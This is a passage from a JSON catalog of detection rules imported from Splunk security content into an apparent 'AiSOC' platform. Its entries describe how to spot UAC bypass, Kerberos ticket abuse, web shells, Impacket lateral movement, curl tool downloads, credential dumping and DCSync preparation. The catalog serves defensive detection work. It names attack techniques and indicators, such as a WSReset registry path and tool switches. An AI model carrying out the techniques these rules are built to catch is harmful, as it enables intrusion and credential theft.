It is extracted temporarily into the temp directory, in a folder with certain markers.\nIt leverages Cisco Network Visibility Module (NVM) flow data, in order to look for a specific parent/child relationship and an initiated network connection.\nThis behavior is exploited by threat actors such as Scarlet Goldfinch to deliver and run malicious scripts as an initial access technique.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1059.005", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-nvm-susp-script-from-archive-triggering-network-activity.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b07c2c9-0cde-4c44-9fa6-59dcf2b25777", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/cisco_nvm___susp_script_from_archive_triggering_network_activity.yml" } }, { "id": "splunk-security-content-8b1297bc-6204-11ec-b7c4-acde48001122", "type": "detection", "name": "Suspicious Kerberos Service Ticket Request", "description": "The following analytic detects suspicious Kerberos Service Ticket (TGS) requests where the requesting account name matches the service name, potentially indicating an exploitation attempt of CVE-2021-42278 and CVE-2021-42287. This detection leverages Event ID 4769 from Domain Controller and Kerberos events. Such activity is significant as it may represent an adversary attempting to escalate privileges by impersonating a domain controller. 
If confirmed malicious, this could allow an attacker to take control of the domain controller, leading to complete domain compromise and unauthorized access to sensitive information.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1078.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-kerberos-service-ticket-request.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b1297bc-6204-11ec-b7c4-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_kerberos_service_ticket_request.yml" } }, { "id": "splunk-security-content-8b4e3d62-f743-11ee-9f6e-acde48001123", "type": "detection", "name": "AWS Bedrock Delete Knowledge Base", "description": "The following analytic identifies attempts to delete AWS Bedrock Knowledge Bases, which are resources that store and manage domain-specific information for AI models. It monitors AWS CloudTrail logs for DeleteKnowledgeBase API calls. This activity could indicate an adversary attempting to remove knowledge bases after compromising credentials, potentially to disrupt business operations or remove traces of data access. Deleting knowledge bases could impact model performance, remove critical business context, or be part of a larger attack to degrade AI capabilities. 
If confirmed malicious, this could represent a deliberate attempt to cause service disruption or data loss.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1485" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/aws-bedrock-delete-knowledge-base.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b4e3d62-f743-11ee-9f6e-acde48001123", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/aws_bedrock_delete_knowledge_base.yml" } }, { "id": "splunk-security-content-8b5901bc-da63-11eb-be43-acde48001122", "type": "detection", "name": "WSReset UAC Bypass", "description": "The following analytic detects a suspicious modification of the registry aimed at bypassing User Account Control (UAC) by leveraging WSReset.exe. It identifies the creation or modification of specific registry values under the path \"*\\\\AppX82a6gwre4fdg3bt635tn5ctqjf8msdd2\\\\Shell\\\\open\\\\command*\". This detection uses data from Endpoint Detection and Response (EDR) agents, focusing on process and registry events. This activity is significant because UAC bypass techniques can allow attackers to execute high-privilege actions without user consent. 
If confirmed malicious, this could lead to unauthorized code execution and potential system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/wsreset-uac-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b5901bc-da63-11eb-be43-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/wsreset_uac_bypass.yml" } }, { "id": "splunk-security-content-8b5ef342-065a-11ec-b0fc-acde48001122", "type": "detection", "name": "Get ADUserResultantPasswordPolicy with Powershell", "description": "The following analytic detects the execution of `powershell.exe` running the `Get-ADUserResultantPasswordPolicy` cmdlet, which is used to obtain the password policy in a Windows domain. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it indicates potential enumeration of domain policies, a common tactic for situational awareness and Active Directory discovery by adversaries. 
If confirmed malicious, this could allow attackers to understand password policies, aiding in further attacks such as password spraying or brute force attempts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1201" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/get-aduserresultantpasswordpolicy-with-powershell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b5ef342-065a-11ec-b0fc-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/get_aduserresultantpasswordpolicy_with_powershell.yml" } }, { "id": "splunk-security-content-8b6c15c7-5556-463d-83c7-986326c21f12", "type": "detection", "name": "Windows Impair Defense Disable Win Defender Network Protection", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender Network Protection. It leverages data from the Endpoint.Registry data model, specifically monitoring changes to the EnableNetworkProtection registry entry. This activity is significant because disabling Network Protection can leave the system vulnerable to network-based threats by preventing Windows Defender from analyzing and blocking malicious network activity. 
If confirmed malicious, this action could allow attackers to bypass security measures, potentially leading to unauthorized access, data exfiltration, or further compromise of the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-network-protection.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b6c15c7-5556-463d-83c7-986326c21f12", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_network_protection.yml" } }, { "id": "splunk-security-content-8b700d7e-54ad-4d7d-81cc-1456c4703306", "type": "detection", "name": "Windows Impair Defense Disable Win Defender App Guard", "description": "The following analytic detects modifications to the Windows registry that disable Windows Defender Application Guard auditing. It leverages data from the Endpoint.Registry data model, focusing on specific registry paths and values. This activity is significant because disabling auditing can hinder security monitoring and threat detection within the isolated environment, making it easier for malicious activities to go unnoticed. 
If confirmed malicious, this action could allow attackers to bypass Windows Defender protections, potentially leading to unauthorized access, data exfiltration, or further system compromise.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1562.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-impair-defense-disable-win-defender-app-guard.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8b700d7e-54ad-4d7d-81cc-1456c4703306", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_impair_defense_disable_win_defender_app_guard.yml" } }, { "id": "splunk-security-content-8ba484e8-4b97-11ec-b19a-acde48001122", "type": "detection", "name": "Possible Browser Pass View Parameter", "description": "The following analytic identifies processes with command-line parameters associated with web browser credential dumping tools, specifically targeting behaviors used by Remcos RAT malware. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and specific file paths. This activity is significant as it indicates potential credential theft, a common tactic in broader cyber-espionage campaigns. 
If confirmed malicious, attackers could gain unauthorized access to sensitive web credentials, leading to further system compromise and data breaches.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1555.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/possible-browser-pass-view-parameter.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ba484e8-4b97-11ec-b19a-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/possible_browser_pass_view_parameter.yml" } }, { "id": "splunk-security-content-8bb3f280-dd9b-11eb-84d5-acde48001122", "type": "detection", "name": "Msmpeng Application DLL Side Loading", "description": "The following analytic detects the suspicious creation of msmpeng.exe or mpsvc.dll in non-default Windows Defender folders. It leverages the Endpoint.Filesystem datamodel to identify instances where these files are created outside their expected directories. This activity is significant because it is associated with the REvil ransomware, which uses DLL side-loading to execute malicious payloads. 
If confirmed malicious, this could lead to ransomware deployment, resulting in data encryption, system compromise, and potential data loss or extortion.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1574.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/msmpeng-application-dll-side-loading.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8bb3f280-dd9b-11eb-84d5-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/msmpeng_application_dll_side_loading.yml" } }, { "id": "splunk-security-content-8be88f46-f7e8-4ae6-b15e-cf1b13392834", "type": "detection", "name": "Linux Auditd Possible Access To Sudoers File", "description": "The following analytic detects potential access or modification of the /etc/sudoers file on a Linux system.\nIt leverages data from Linux Auditd, focusing on events of type PATH or CWD.\nThis activity could be significant because the sudoers file controls user permissions for executing commands with elevated privileges.\nCorrelate this with related EXECVE or PROCTITLE events to identify the process or user responsible for the access or modification.\nIf confirmed malicious, an attacker could gain persistence or escalate privileges, compromising the security of the targeted host.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.003" ], "log_source": null, "playbook": null, "verified": false, "source": 
"splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-auditd-possible-access-to-sudoers-file.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8be88f46-f7e8-4ae6-b15e-cf1b13392834", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_auditd_possible_access_to_sudoers_file.yml" } }, { "id": "splunk-security-content-8c00a385-9b86-4ac0-8932-c9ec3713b159", "type": "detection", "name": "Suspicious Rundll32 dllregisterserver", "description": "The following analytic detects the execution of rundll32.exe with the DllRegisterServer command to load a DLL. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions and process details. This activity is significant as it may indicate an attempt to register a malicious DLL, which can be a method for code execution or persistence. 
If confirmed malicious, an attacker could gain unauthorized code execution, escalate privileges, or maintain persistence within the environment, posing a severe security risk.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.011" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/suspicious-rundll32-dllregisterserver.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c00a385-9b86-4ac0-8932-c9ec3713b159", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/suspicious_rundll32_dllregisterserver.yml" } }, { "id": "splunk-security-content-8c14eeee-2af1-4a4b-bda8-228da0f4862a", "type": "detection", "name": "Detect Exchange Web Shell", "description": "The following analytic identifies the creation of suspicious .aspx files in known drop locations for Exchange exploitation, specifically targeting paths associated with HAFNIUM group and vulnerabilities like ProxyShell and ProxyNotShell. It leverages data from the Endpoint datamodel, focusing on process and filesystem events. This activity is significant as it may indicate a web shell deployment, a common method for persistent access and remote code execution. 
If confirmed malicious, attackers could gain unauthorized access, execute arbitrary commands, and potentially escalate privileges within the Exchange environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1133", "T1190", "T1505.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-exchange-web-shell.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c14eeee-2af1-4a4b-bda8-228da0f4862a", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_exchange_web_shell.yml" } }, { "id": "splunk-security-content-8c15183e-2e70-4db4-86c3-88f8d9129b66", "type": "detection", "name": "Cisco Secure Firewall - High EVE Threat Confidence", "description": "The following analytic detects connections with a high Encrypted Visibility Engine (EVE) threat confidence score, indicating potentially malicious behavior within encrypted traffic. It leverages Cisco Secure Firewall Threat Defense logs and evaluates the EVE_ThreatConfidencePct field, which reflects the system's confidence in classifying encrypted sessions as threats based on machine learning models and behavioral analysis. A score equal to or greater than 80 suggests the connection is highly likely to be associated with malware command and control (C2), remote access tools, or suspicious tunneling behavior. 
If confirmed malicious, this may indicate covert communication over TLS from compromised hosts.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1041", "T1071.001", "T1105", "T1573.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/cisco-secure-firewall-high-eve-threat-confidence.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c15183e-2e70-4db4-86c3-88f8d9129b66", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/cisco_secure_firewall___high_eve_threat_confidence.yml" } }, { "id": "splunk-security-content-8c1de57d-abc1-4b41-a727-a7a8fc5e0857", "type": "detection", "name": "Linux Ingress Tool Transfer with Curl", "description": "The following analytic detects the use of the curl command with specific switches (-O, -sO, -ksO, --output) commonly used to download remote scripts or binaries. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line arguments. This activity is significant as it may indicate an attempt to download and execute potentially malicious files, often used in initial stages of an attack. 
If confirmed malicious, this could lead to unauthorized code execution, enabling attackers to compromise the system further.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1105" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/linux-ingress-tool-transfer-with-curl.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c1de57d-abc1-4b41-a727-a7a8fc5e0857", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/linux_ingress_tool_transfer_with_curl.yml" } }, { "id": "splunk-security-content-8c372853-f459-4995-afdc-280c114d33ab", "type": "detection", "name": "Windows AD Domain Replication ACL Addition", "description": "The following analytic detects the addition of permissions required for a DCSync attack, specifically DS-Replication-Get-Changes, DS-Replication-Get-Changes-All, and DS-Replication-Get-Changes-In-Filtered-Set. It leverages EventCode 5136 from the Windows Security Event Log to identify when these permissions are granted. This activity is significant because it indicates potential preparation for a DCSync attack, which can be used to replicate AD objects and exfiltrate sensitive data. 
If confirmed malicious, an attacker could gain extensive access to Active Directory, leading to severe data breaches and privilege escalation.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1484" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-ad-domain-replication-acl-addition.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c372853-f459-4995-afdc-280c114d33ab", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_ad_domain_replication_acl_addition.yml" } }, { "id": "splunk-security-content-8c3d1f2e-7b4a-45e3-9d8f-6a2e4c9b1234", "type": "detection", "name": "Windows PowerShell Script From WindowsApps Directory", "description": "The following analytic identifies the execution of PowerShell scripts from the WindowsApps directory, which is a common technique used in malicious MSIX package execution.\nThis detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on process command lines and parent process paths.\nThis activity is significant as adversaries have been observed using MSIX packages with embedded PowerShell scripts (particularly StartingScriptWrapper.ps1) to execute malicious code.\nIf confirmed malicious, this could allow attackers to execute arbitrary code, establish persistence, or deliver malware while evading traditional detection mechanisms.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ 
"T1059.001", "T1204.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-powershell-script-from-windowsapps-directory.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c3d1f2e-7b4a-45e3-9d8f-6a2e4c9b1234", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_powershell_script_from_windowsapps_directory.yml" } }, { "id": "splunk-security-content-8c4866e4-f488-4253-8537-7dc4f954c292", "type": "detection", "name": "HTTP Malware User Agent", "description": "This Splunk query analyzes web logs to identify and categorize user agents, detecting various types of malware. 
This activity can signify possible compromised hosts on the network.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.network" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1071.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/http-malware-user-agent.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c4866e4-f488-4253-8537-7dc4f954c292", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/network/http_malware_user_agent.yml" } }, { "id": "splunk-security-content-8c5835b9-39d9-438b-817c-95f14c69a31e", "type": "detection", "name": "Detect HTML Help URL in Command Line", "description": "The following analytic detects the execution of hh.exe (HTML Help) loading a Compiled HTML Help (CHM) file from a remote URL. This detection leverages data from Endpoint Detection and Response (EDR) agents, focusing on command-line executions containing URLs. This activity is significant as it can indicate an attempt to execute malicious scripts via CHM files, potentially leading to unauthorized code execution. 
If confirmed malicious, this could allow an attacker to run scripts using engines like JScript or VBScript, leading to further system compromise or data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1218.001" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/detect-html-help-url-in-command-line.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c5835b9-39d9-438b-817c-95f14c69a31e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/detect_html_help_url_in_command_line.yml" } }, { "id": "splunk-security-content-8c6d52ec-d5f2-4b2f-8ba1-f32c047a71fa", "type": "detection", "name": "O365 External Guest User Invited", "description": "The following analytic identifies the invitation of an external guest user within Azure AD. With Azure AD B2B collaboration, users and administrators can invite external users to collaborate with internal users. External guest account invitations should be monitored by security teams as they could potentially lead to unauthorized access. An example of this attack vector was described at BlackHat 2022 by security researcher Dirk-Jan during his talk `Backdooring and Hijacking Azure AD Accounts by Abusing External Identities`. 
This detection leverages the Universal Audit Log (UAL)/o365:management:activity sourcetype as a detection data source.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.cloud" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1136.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/o365-external-guest-user-invited.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c6d52ec-d5f2-4b2f-8ba1-f32c047a71fa", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/cloud/o365_external_guest_user_invited.yml" } }, { "id": "splunk-security-content-8c9a06bc-9939-4425-9bb9-be2371f7fb7e", "type": "detection", "name": "Windows System User Privilege Discovery", "description": "The following analytic detects the execution of `whoami.exe` with the `/priv` parameter, which displays the privileges assigned to the current user account. It leverages data from Endpoint Detection and Response (EDR) agents, focusing on process names and command-line executions. This activity is significant as it may indicate an adversary attempting to enumerate user privileges, a common step in the reconnaissance phase of an attack. 
If confirmed malicious, this could lead to privilege escalation or further exploitation within the environment.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1033" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-system-user-privilege-discovery.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8c9a06bc-9939-4425-9bb9-be2371f7fb7e", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_system_user_privilege_discovery.yml" } }, { "id": "splunk-security-content-8ca13343-7405-4916-a2d1-ae34ce0c28ae", "type": "detection", "name": "Windows Mark Of The Web Bypass", "description": "The following analytic identifies a suspicious process that deletes the Mark-of-the-Web (MOTW) data stream. It leverages Sysmon EventCode 23 to detect when a file's Zone.Identifier stream is removed. This activity is significant because it is a common technique used by malware, such as Ave Maria RAT, to bypass security restrictions on files downloaded from the internet. 
If confirmed malicious, this behavior could allow an attacker to execute potentially harmful files without triggering security warnings, leading to further compromise of the system.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1553.005" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/windows-mark-of-the-web-bypass.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ca13343-7405-4916-a2d1-ae34ce0c28ae", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/windows_mark_of_the_web_bypass.yml" } }, { "id": "splunk-security-content-8ce07472-496f-11ec-ab3b-3e22fbd008af", "type": "detection", "name": "Impacket Lateral Movement Commandline Parameters", "description": "The following analytic identifies the use of suspicious command-line parameters associated with Impacket tools, such as `wmiexec.py`, `smbexec.py`, `dcomexec.py`, and `atexec.py`, which are used for lateral movement and remote code execution. It detects these activities by analyzing process execution logs from Endpoint Detection and Response (EDR) agents, focusing on specific command-line patterns. This activity is significant because Impacket tools are commonly used by adversaries and Red Teams to move laterally within a network. 
If confirmed malicious, this could allow attackers to execute commands remotely, potentially leading to further compromise and data exfiltration.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1021.002", "T1021.003", "T1047", "T1543.003" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/impacket-lateral-movement-commandline-parameters.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8ce07472-496f-11ec-ab3b-3e22fbd008af", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/impacket_lateral_movement_commandline_parameters.yml" } }, { "id": "splunk-security-content-8d124810-b3e4-11eb-96c7-acde48001122", "type": "detection", "name": "SLUI RunAs Elevated", "description": "The following analytic detects the execution of the Microsoft Software Licensing User Interface Tool (`slui.exe`) with elevated privileges using the `-verb runas` function. This activity is identified through logs from Endpoint Detection and Response (EDR) agents, focusing on specific registry keys and command-line parameters. This behavior is significant as it indicates a potential privilege escalation attempt, which could allow an attacker to gain elevated access and execute malicious actions with higher privileges. 
If confirmed malicious, this could lead to unauthorized system changes, data exfiltration, or further compromise of the affected endpoint.", "version": "1.0.0", "author": "AiSOC", "tags": [ "categories.endpoint" ], "severity": "medium", "category": "_quarantine", "mitre_techniques": [ "T1548.002" ], "log_source": null, "playbook": null, "verified": false, "source": "splunk-security-content", "tier": "imported", "enabled": false, "path": "detections/splunk-imports/_quarantine/slui-runas-elevated.yaml", "quarantine_reason": "imported rule; upstream query language not directly executable by the AiSOC engine yet", "provenance": { "source": "splunk/security_content", "source_id": "8d124810-b3e4-11eb-96c7-acde48001122", "source_commit": "4d4c7ee", "license": "Apache-2.0", "license_url": "https://github.com/splunk/security_content/blob/develop/LICENSE", "imported_at": "2026-05-04", "upstream_path": "detections/endpoint/slui_runas_elevated.yml" } }, { "id": "splunk-security-content-8d12f268-c567-4557-9813-f8389e235c06", "type": "detection", "name": "ASL AWS IAM Failure Group Deletion", "description": "The following analytic detects failed attempts to delete AWS IAM groups, triggered by access denial, conflicts, or non-existent groups. It operates by monitoring CloudTrail logs for specific error codes related to deletion failures. This behavior is significant for a SOC as it may indicate unauthorized attempts to modify access controls or disrupt operations by removing groups. Such actions could be part of a larger attack aiming to escalate privileges or impair security protocols. 
